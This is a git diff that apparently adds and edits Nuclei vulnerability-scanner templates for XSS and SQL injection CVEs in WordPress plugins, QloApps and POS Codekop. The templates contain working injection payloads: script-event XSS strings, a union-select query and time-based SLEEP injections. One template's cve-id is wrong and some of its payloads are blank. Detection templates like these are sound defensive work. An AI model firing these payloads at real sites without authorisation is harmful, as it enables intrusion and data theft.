log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + POST /wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + page=%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "")' + - 'contains(body_2, "Tiempo")' + condition: and diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml index 6c89c80b4d..9cdb305829 100644 --- a/http/cves/2023/CVE-2023-26842.yaml +++ b/http/cves/2023/CVE-2023-26842.yaml @@ -17,7 +17,7 @@ info: metadata: max-request: 2 verified: true - tags: cve,cve2023,churchcrm,stored,xss,authenticated + tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-26843.yaml b/http/cves/2023/CVE-2023-26843.yaml index 6a91a88389..8d281bfca8 100644 --- a/http/cves/2023/CVE-2023-26843.yaml +++ b/http/cves/2023/CVE-2023-26843.yaml @@ -17,7 +17,7 @@ info: metadata: max-request: 2 verified: true - tags: cve,cve2023,churchcrm,stored,xss,authenticated + tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-30256.yaml b/http/cves/2023/CVE-2023-30256.yaml new file mode 100644 index 0000000000..ce6d92452d --- /dev/null +++ b/http/cves/2023/CVE-2023-30256.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-30256 + +info: + name: Webkul QloApps 1.5.2 - Cross-site Scripting + author: theamanrawat + severity: medium + description: | + Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file. + reference: + - https://github.com/webkul/hotelcommerce + - http://packetstormsecurity.com/files/172542/Webkul-Qloapps-1.5.2-Cross-Site-Scripting.html + - https://github.com/ahrixia/CVE-2023-30256 + - https://nvd.nist.gov/vuln/detail/CVE-2023-30256 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-30256 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2023,xss,webkul-qloapps,unauth + +http: + - method: GET + path: + - "{{BaseURL}}/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(document.domain)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "xss onfocus=alert(document.domain) autofocus= xss" + - "hasConfirmation" + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-30777.yaml b/http/cves/2023/CVE-2023-30777.yaml new file mode 100644 index 0000000000..3a90d33596 --- /dev/null +++ b/http/cves/2023/CVE-2023-30777.yaml @@ -0,0 +1,44 @@ +id: CVE-2023-30777 + +info: + name: Advanced Custom Fields < 6.1.6 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Advanced Custom Fields beofre 6.1.6 is susceptible to cross-site scripting via the post_status parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + reference: + - https://wpscan.com/vulnerability/95ded80f-a47b-411e-bd17-050439bf565f + - https://wordpress.org/plugins/advanced-custom-fields/advanced/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-30777 + remediation: Fixed in version 6.1.6. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-30777 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2023,advance-custom-field,wp,wp-plugin,wordpress,authenticated,xss + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + + - | + GET /wp-admin/edit.php?post_type=acf-post-type&post_status=%22style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(content_type_2, "text/html")' + - 'contains(body_2, "onanimationstart=alert(document.domain)//")' + - 'contains(body_2, "Advanced Custom Fields")' + condition: and diff --git a/http/cves/2023/CVE-2023-31548.yaml b/http/cves/2023/CVE-2023-31548.yaml index 0cae8c42fa..29b5ad3781 100644 --- a/http/cves/2023/CVE-2023-31548.yaml +++ b/http/cves/2023/CVE-2023-31548.yaml @@ -17,7 +17,7 @@ info: metadata: max-request: 2 verified: true - tags: cve,cve2023,churchcrm,stored,xss,authenticated + tags: cve,cve2023,churchcrm,stored-xss,xss,authenticated http: - raw: diff --git a/http/cves/2023/CVE-2023-36287.yaml b/http/cves/2023/CVE-2023-36287.yaml new file mode 100644 index 0000000000..eb0ef67c53 --- /dev/null +++ b/http/cves/2023/CVE-2023-36287.yaml @@ -0,0 +1,47 @@ +id: CVE-2023-36287 + +info: + name: Webkul QloApps 1.6.0 - Cross-site Scripting + author: theamanrawat + severity: medium + description: | + An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST controller parameter. + reference: + - https://github.com/webkul/hotelcommerce + - https://flashy-lemonade-192.notion.site/Cross-site-scripting-via-controller-parameter-in-QloApps-1-6-0-97e409ce164f40d195b625b9bf719900 + - https://nvd.nist.gov/vuln/detail/CVE-2023-36287 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-36287 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2023,xss,webkul-qloapps,unauth + +http: + - raw: + - | + POST / HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + controller=change-currency9405'-alert(document.domain)-'&id_currency= + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "'change-currency9405'-alert(document.domain)-'';" + - "customizationIdMessage" + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-36289.yaml b/http/cves/2023/CVE-2023-36289.yaml new file mode 100644 index 0000000000..d7051ea8a8 --- /dev/null +++ b/http/cves/2023/CVE-2023-36289.yaml @@ -0,0 +1,50 @@ +id: CVE-2023-36289 + +info: + name: Webkul QloApps 1.6.0 - Cross-site Scripting + author: theamanrawat + severity: medium + description: | + An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter. + reference: + - https://github.com/webkul/hotelcommerce + - https://flashy-lemonade-192.notion.site/Cross-site-scripting-in-POST-Request-via-email_create-and-back-parameter-in-QloApps-1-6-0-e05548203d744daf9047d82fc94b19b7 + - https://nvd.nist.gov/vuln/detail/CVE-2023-36289 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-36289 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2023,xss,webkul-qloapps,unauth + +variables: + email: "{{randstr}}@{{rand_base(5)}}.com" + +http: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + SubmitCreate=1&ajax=true&back=my-account&controller=authentication&email={{email}}&email_create={{email}}"%20onmouseover=alert(document.domain)%20y=&token={{randstr}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'onmouseover=alert(document.domain)' + - 'hasConfirmation' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/cves/2023/CVE-2023-36346.yaml b/http/cves/2023/CVE-2023-36346.yaml new file mode 100644 index 0000000000..e30965bf9a --- /dev/null +++ b/http/cves/2023/CVE-2023-36346.yaml @@ -0,0 +1,42 @@ +id: CVE-2023-36346 + +info: + name: POS Codekop v2.0 - Cross-site Scripting + author: r3Y3r53 + severity: medium + description: | + POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php. + reference: + - https://yuyudhn.github.io/pos-codekop-vulnerability/ + - https://www.youtube.com/watch?v=bbbA-q1syrA + - https://nvd.nist.gov/vuln/detail/CVE-2023-36346 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-30256 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2023,xss,pos,codekop,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/print.php?nm_member=" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/exposed-panels/qdpm-login-panel.yaml b/http/exposed-panels/qdpm-login-panel.yaml new file mode 100644 index 0000000000..ca2afd9f4f --- /dev/null +++ b/http/exposed-panels/qdpm-login-panel.yaml @@ -0,0 +1,35 @@ +id: qdpm-login-panel + +info: + name: qdPM Login Panel + author: theamanrawat + severity: info + metadata: + verified: "true" + shodan-query: http.favicon.hash:762074255 + tags: panel,qdpm,login + +http: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/index.php/login' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'qdPM' + - '/index.php/login/restorePassword' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/other/yeswiki-stored-xss.yaml b/http/vulnerabilities/other/yeswiki-stored-xss.yaml index 4327f1b5d4..68c7640bad 100644 --- a/http/vulnerabilities/other/yeswiki-stored-xss.yaml +++ b/http/vulnerabilities/other/yeswiki-stored-xss.yaml @@ -16,7 +16,7 @@ info: max-request: 2 verified: true shodan-query: http.html:"yeswiki" - tags: yeswiki,xss,stored,huntr + tags: yeswiki,xss,stored-xss,huntr http: - raw: diff --git a/http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml b/http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml new file mode 100644 index 0000000000..a4b713cde8 --- /dev/null +++ b/http/vulnerabilities/wordpress/contus-video-gallery-sqli.yaml @@ -0,0 +1,44 @@ +id: contus-video-gallery-sqli + +info: + name: WordPress Video Gallery <= 2.8 - SQL Injection + author: theamanrawat + severity: critical + description: | + The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action (available to unauthenticated users), leading to an SQL injection. + reference: + - https://wpscan.com/vulnerability/b625aee5-8fd1-4f3e-9a9c-d41bdec13243 + - https://wordpress.org/plugins/photo-gallery/ + remediation: Fixed in version 1.6.3 + metadata: + verified: true + tags: sqli,wpscan,wordpress,contus-video-gallery,unauth + +variables: + num: '999999999' + +http: + - raw: + - | + @timeout: 10s + POST /wp-admin/admin-ajax.php?image_id=123 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + action=GalleryBox&filter_tag=1)" union select * from (select 123)a1 join (select 2)a2 join (select 3)a3 join (select 2)a4 join (select 2)a5 join (select 2)a6 join (select 2)a7 join (select 2)a8 join (select 2)a9 join (select 2)a10 join (select 2)a11 join (select 2)a12 join (select 2)a13 join (select 2)a14 join (select 2)a15 join (select 2)a16 join (select 2)a17 join (select 2)a18 join (select version())a19 join (select md5({{num}}))a20 join (select 2)a21 join (select 2)a22 join (select 2)a23-- - + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "c8c605999f3d8352d7bb792cf3fdb25b" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 diff --git a/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml b/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml new file mode 100644 index 0000000000..599bc56d83 --- /dev/null +++ b/http/vulnerabilities/wordpress/leaguemanager-sql-injection.yaml @@ -0,0 +1,30 @@ +id: leaguemanager-sql-injection + +info: + name: LeagueManager <= 3.9.11 - SQL Injection + author: theamanrawat + severity: critical + description: | + The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action (available to unauthenticated users), leading to an SQL injection. + reference: + - https://wpscan.com/vulnerability/f3be48f5-ae2c-4e27-80ca-664829b8fba3 + - https://wordpress.org/plugins/leaguemanager/ + metadata: + verified: true + tags: sqli,wp,wp-plugin,wordpress,leaguemanager,unauth + +http: + - raw: + - | + @timeout: 10s + GET /?season=1&league_id=1season=1&league_id=1'+AND+(SELECT+1909+FROM+(SELECT(SLEEP(6)))ZiBf)--+qODp&match_day=1&team_id=1&match_day=1&team_id=1 HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "LeagueManagerAjaxL10n")' + condition: and diff --git a/http/vulnerabilities/wordpress/notificationx-sqli.yaml b/http/vulnerabilities/wordpress/notificationx-sqli.yaml new file mode 100644 index 0000000000..7a6a6c809f --- /dev/null +++ b/http/vulnerabilities/wordpress/notificationx-sqli.yaml @@ -0,0 +1,43 @@ +id: notificationx-sqli + +info: + name: NotificationX < 2.3.12 - SQL Injection + author: theamanrawat + severity: high + description: | + The plugin does not validate and escape the id parameter in its notificationx/v1/notification REST endpoint before using it in a SQL statement, which could allow unauthenticated attackers to perform SQL Injection attacks. + reference: + - https://wpscan.com/vulnerability/d1480717-726d-4be2-95cb-1007a3f010bb + - https://wordpress.org/plugins/notificationx/ + remediation: Fixed in version 2.3.12 + metadata: + verified: true + tags: sqli,wp,wp-plugin,wordpress,notificationx-sql-injection + +http: + - raw: + - | + GET /wp-json/ HTTP/1.1 + Host: {{Hostname}} + + - | + @timeout: 10s + GET /wp-json/notificationx/v1/notification/1?api_key={{md5('{{apikey}}')}}&id[1]=%3d(SELECT/**/1/**/WHERE/**/SLEEP(6)) HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'status_code == 401' + - 'contains(content_type, "application/json")' + - 'contains(body, "There is no notification created with this id")' + condition: and + + extractors: + - type: regex + name: apikey + group: 1 + regex: + - '"home":"(.*?)",' + internal: true diff --git a/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml b/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml new file mode 100644 index 0000000000..92da0a19bf --- /dev/null +++ b/http/vulnerabilities/wordpress/zero-spam-sql-injection.yaml @@ -0,0 +1,32 @@ +id: zero-spam-sql-injection + +info: + name: WordPress Zero Spam <= 2.1.1 - Blind SQL Injection + author: theamanrawat + severity: critical + description: | + The WordPress Zero Spam WordPress plugin was affected by an Unauthenticated Blind SQL Injection security vulnerability. + reference: + - https://wpscan.com/vulnerability/44cc8d59-9b45-46b7-afaf-894e4ba62dd5 + - https://wordpress.org/plugins/zero-spam/ + remediation: Fixed in version 2.2.0 + metadata: + verified: true + tags: wp,wp-plugin,wordpress,zero-spam,sqli,unauth + +http: + - raw: + - | + @timeout: 10s + GET / HTTP/1.1 + Host: {{Hostname}} + Client-IP: '+(select(0)from(select(sleep(7)))v)+' + + matchers: + - type: dsl + dsl: + - 'duration>=7' + - 'status_code == 200' + - 'contains(content_type, "text/html")' + - 'contains(body, "zerospam-js")' + condition: and